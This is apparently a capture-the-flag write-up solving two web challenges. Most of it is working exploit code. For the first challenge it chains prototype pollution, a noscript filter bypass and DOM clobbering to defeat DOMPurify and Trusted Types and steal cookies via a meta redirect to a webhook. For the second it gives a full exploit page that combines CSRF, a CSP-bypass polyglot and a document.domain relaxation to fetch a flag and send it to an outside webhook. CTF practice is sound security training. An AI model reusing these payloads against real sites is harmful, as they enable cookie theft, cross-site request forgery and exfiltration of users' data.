wus.md

So safe website

I inspired this challenge while i was playing a challenge by @53c0nd-2473.

1. Overwrite Object object's getOwnPropertyNames with "nice feature" to bypass dompurify + trusted types. {"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
2. Bypass custom filter with noscript tag. example: <noscript><img src="</noscript><img src=1 onerror=alert()">
3. Steal cookies with using debug.js and set parent's name to cookies and do redirect with meta tag
4. Send window.name to your webhook.

var ppPayload = `{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}`;
var customFilterBypass = `
<noscript>
	<img/id="
	     </noscript><img><iframe/srcdoc='HTMLINJ'></iframe><meta/http-equiv='refresh'/content='1;url=https://webhook.site/6-b79f993da3a' />
	">
</noscript>`.replace(/\n/g,"").replace(/ /g,"").replace(/\t/g,"");
var domclobbering = `
<iframe srcdoc="NEXT" name="debugOptions"></iframe><link href="/ff" rel="stylesheet"><link href="/qqq" rel="stylesheet"><link href="/ffds" rel="stylesheet"><link href="/df" rel="stylesheet"><script src="/js/debug.js"></script>
`.replace(/"/g,"&quot;");
domclobbering = domclobbering.replace("NEXT",`
<iframe srcdoc="NEXT" name="0"></iframe>
`).replace(/"/g,"&amp;quot;")

domclobbering = domclobbering.replace("NEXT",`
<br id="0" clear="parent"><font id="1" face="name"><object id="2" code="document"></object><input id="3" accept="cookie">
`.replace(/"/g,"&amp;amp;quot;"));

customFilterBypass = customFilterBypass.replace("HTMLINJ",domclobbering).replace(/\n/g,"").replace(/ /g,"/");

console.log(`http://sosafewebsite.peykar.io:7070/?name=${encodeURIComponent(customFilterBypass)}&wow=${encodeURIComponent(ppPayload)}`);

Another note app

1. CSRF to add note
2. Bypass CSP on notes website with putting script and html file in a same file.

alert();
`
<script src="/self">
</script>
`

3. Make main website same-origin with note website with giving document.domain=document.domain as feature
4. Use main domain's fetch to grep the flag. Exploit:

<html>
	<head>
	</head>
	<body>
		<script>
			window.target = {domain : "139.162.238.54", main : "http://139.162.238.54:9090",webhook:"https://webhook.site/-b79b-8005f993da3a"};
			var status = window.name;
			var t = 8;
			
			function getIncludeScriptPayload(){
				let payload = document.createElement("iframe");
				payload.srcdoc =  `<script src=${target.main}/note><\/script>`;
				return payload.outerHTML;
			}

			if(status == "csrf_note_include_script"){
				var form = document.createElement("form");
				form.id = "csrfForm";
				form.method = "POST";
				form.action = target.main+"/note";
				var inp = document.createElement("input");
				var jspayload = `
					document.domain="${target.domain}";
					setTimeout(()=>{
						parent.parent.opener.fetch("/flag",{method:"POST",headers:{"x-i-want":"flag"}}).then(r=>r.text()).then(r=>{
							parent.parent.location="${target.webhook}?flag="+r;
						});
					},1000);
				`.replace(/\n/g,"",/ /g,"");
				inp.value = jspayload+";`"+getIncludeScriptPayload()+"`";
				inp.name = "note";
				form.appendChild(inp);
				document.body.appendChild(form);
				csrfForm.submit();
			}


			if(status == "start_attack"){
				window.open("?","csrf_note_include_script");
				document.location = `${target.main}?feature=document.domain=document.domain`
			}

			function startattack(){
				window.open("?","start_attack");
			}

			if(status == "" || !isNaN(status)){
				startattack();
			}
		</script>
		<button onclick="startattack()">Attack</button>
	</body>
</html>